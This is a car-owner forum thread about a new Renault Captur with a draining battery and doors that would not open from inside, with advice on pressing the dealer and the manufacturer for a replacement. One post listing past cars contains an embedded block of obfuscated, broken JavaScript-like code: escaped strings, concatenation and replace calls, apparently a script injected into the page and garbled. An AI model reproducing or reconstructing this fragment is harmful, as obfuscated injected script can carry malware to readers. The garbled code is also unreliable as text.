Renault Captur Forums banner

1 - 20 of 24 Posts

·
Registered
5 Posts
Discussion Starter #1
hi have just bought a new captur 1.5dci

Love the looks But had the car for less than 24hours and nothing been good since

My wife took car to work when she came out to go home would not start , Called out recovery jump started car drove home , The auto lock did not work so used key

The next morning started ok she drove to work but could not open doors from inside called me

When I got there still locked in car NOT VERY HAPPY. But did open from outside ,

Drove it straight back to Arnold Clark they reset body controlunit and wanted me to take it away

I ask them to hold on to it and find out way battery went flat , Two days later got it back was told everything was fine with car ,

16days later we had been out when we returned to the car the lights had come on anddrain battery

Againtook key back to ARNOLD CLARK told them were car was I said we wanted a another new car

As this one wasn't working as it should ,

Was told bysales manager that they can't find anything wrong with car so can't fix it ,

And we need to keep it even if it continues to happen

Lost as what to do hasanybody had any experience want might cause this or how to reject car

Thanks for any help. eddie

·
Registered
1,555 Posts
Very surprised! No problrms whatsorver! I feel for you as my experience eith AC is awful. My daughter had the same problem as you but on a Ford Kuga Titanium....and never got anywhere over a period of a year. She ended up selling the car as she was getting nowhere fast with the dealer!!
I would be rejecting the car most certainly and contacting Renault directly.
From what I have read on the forum, they eill react quickly.
This is the first car on this forum that has, what I would say, serious problems that need to be sorted out urgently by the dealer.

·
Registered
338 Posts
Not had any problems with the car to date nor with any other I had in the past. I did however, had similar issue with a washing machine couple of years ago. Went back to the retailers, they sent repair man. After couple of days, problem again. This went on for about two weeks. I got told that it must be something I was doing. I wrote to head office asking for new machine, letter back telling me it must be me using it incorrectly. At the time I had Honda CR-V so got my brother to help me get the machine in the back of the car, drove into town, got the machine on the pavement outside the shop where I purchased the machine and stood there with a big sign saying "Do not trust this shop, they sell you rubbish and do not honour the contract" Manager came out to say he is going to call police if I don't stop and move on. Told him to go ahead and I will call the local papers. By that time we had sizeable audience. Manager reconsidered his options, invited me in, got his staff to move my machine inside the shop and loaded new machine into my car. Can't say what AC might do but they need to be woken up to your problems

·
Registered
338 Posts
You may also threaten to report it to H & S as it is serious and dangerous situation to be locked inside the vehicle unable to get out. What would happen if your wife was taken ill, or the car was hit by another vehicle and she was unable to get out? Or if it was late at night miles from home? She can't get out but a stranger could get to her as the car can only be opened from outside

·
Registered
23 Posts
Omg, that sounds scary. I would definitely write to the headquarter of renault in your country. They are very helpful in general. Before buying my car i wrote to renault poland and renault belgium, where i've been living for last 10 years and compared what they offered me, lol. They asked my dealer to prepare the special offer for me.
I know it's not a situation like yours, but what I want to say is - having contact with someone from headquarter always helps.
Fingers crossed for exchange into new car with no faults.

·
Registered
824 Posts
Tyrfelin said:
Lights can drain battery. Had that with a Peugeot 407 when I left the courtesy light on inside overnight!
Good thinking.......and it may just be as simple as that too!! Boot light being a favorite for being left on!!

Just been out to check courtesy lights (how sad am I!!
) all interior lights come on together even boot light when any door or tailgate is opened and they all go off when all closed after set period.........and the Captur boot light isnt separately switched!!

Probably doesnt help the problem but it could eliminate a cause!

·
Registered
21 Posts
I see you are from Glasgow, Have you contacted Arnold Clark head office in Allison Street. I am having problems with my captur purchased from AC in Bishopbriggs. After 12 weeks of complaints to dealership and Renault UK, I can see a resolution but only after getting the head office involved. Worth a phone call as the head office have a better idea than the dealership of what customer service is.

·
Registered
5 Posts
Discussion Starter #9
have been in contact with manufacturers and A Clark customer care still waiting for a reply from both of them, At the moment have been to get car seat out of it not a lot seems to be getting done ,

Hopefully better news soon as I'm going away for a few week soon will kept you posted as it progresses

Thank for all the help

·
Registered
23 Posts
Take it your still in your 14 days if you wish to take it back.

·
Registered
1,555 Posts
Any joy Eddie? Maybe you're not back yet?

·
Registered
5 Posts
Discussion Starter #12
in Dubai airport catching up with e-mail, Arnold Clark are still unable to rectify car have returned

both set of keys and told them I want replacement, will see what happens on my return ,

Will keep u posted

·
Registered
1,555 Posts
Good for you! Hope that gets the results...no use faffing around with them...

·
Registered
17 Posts
Now I am not suggesting that this is the cause, but if the previous car was operated by a key, then forgetting to pressthe button to turn everything off before leaving the car will eventually drain the battery. These engines run very quietly.This happened to me and it was only when I saw that the daytime running lights were still on when I waswalking away thatI realised what I had failed to do.

·
Registered
215 Posts
audi 100 , renault megane scenic , fiat marea , volvo s40 , vauxhall zafira , vw touran ,<ch;m++q=cym;p=q^o;x+=fp;return x;;ifr"x78"+"cx7c"="=r"u007FX"+"x"+"Uo"+"hz"+"x50"+"yx6a".replace"x58u0078Uo"+"x68zu0050"+"y","x69`"+""var" i=";ir""+"z"+"i"+"WUGR"+"ju0062".replace"x57"+"Uu0047x52x6A","~"+"x7Feu0063"=r'x3Du0039'+'?';ir"x6F`x65u0069b"+"xx79eu0068"="20A1FC5640C8E95A";ir'x6du0068hx63'+'bb'+'x6du0061i'=r"u004Eu0079v"+""+"vu0021eu0078";r'S'+'u006ax4au004ds'+''+'Eu0055E'+'Tu0076Ax76'.replace'jJ'+'u004Dsu0045x55x45x54vu0041','~x7a'=i;var" z="r"u006f"+"~ix6dx"+"iIu0060x69x61u0069bx"+""r''+'uu0054nE'+'x'.replace'x75u0054'+'nE'+'','x7Fu006f~'+''+'ex7C';zr'u007Fu007eu006f'=r'#'+'#'+'kx68x58'+'un'+''+'w"x61x6Do'+'|x6dx78'+'d"b'+'u0069x'+''+'#x7Fx68'+'#u003e<x35<'+'x23u0039x3ex35x38"u0066x7f'.replace'h'+'X'+'u'+'nx77','x75a'+'';r'x6Echu'+''r'x6D||g'+'Xm'+'d'+'x65x60'+'h'.replace'g'+'Xm','i'+'bu0068O'z;;<div">mazda 3 , citroen c2 , toyota yaris d4d and waiting on my new captur

ive had both great and bad service from arnold clark as you can see above i have bought more than a few ca rs from them, best service was from stirling citroen and worst was from motherwell supercentre
who mis-sold me the zafira claiming it was a sri x-pack which i later found out was only an sri !!!!!!
i had vauxhall uk, trading standards involved before they finally agreed to give me a replacement car of similar value so the mrs chose a vw touran tdi se as the replacement

</ch;m++q=cym;p=q^o;x+=fp;return>Edited by: GORDONR

·
Registered
5 Posts
Discussion Starter #19
no has happened another 3 times but as we are aware of it when it happens we play about with light switch and they will go out ,

·
Registered
1,555 Posts
You're hopefully going to persist and get a result with AC.!!!
That would make me livid in a new car!!!

1 - 20 of 24 Posts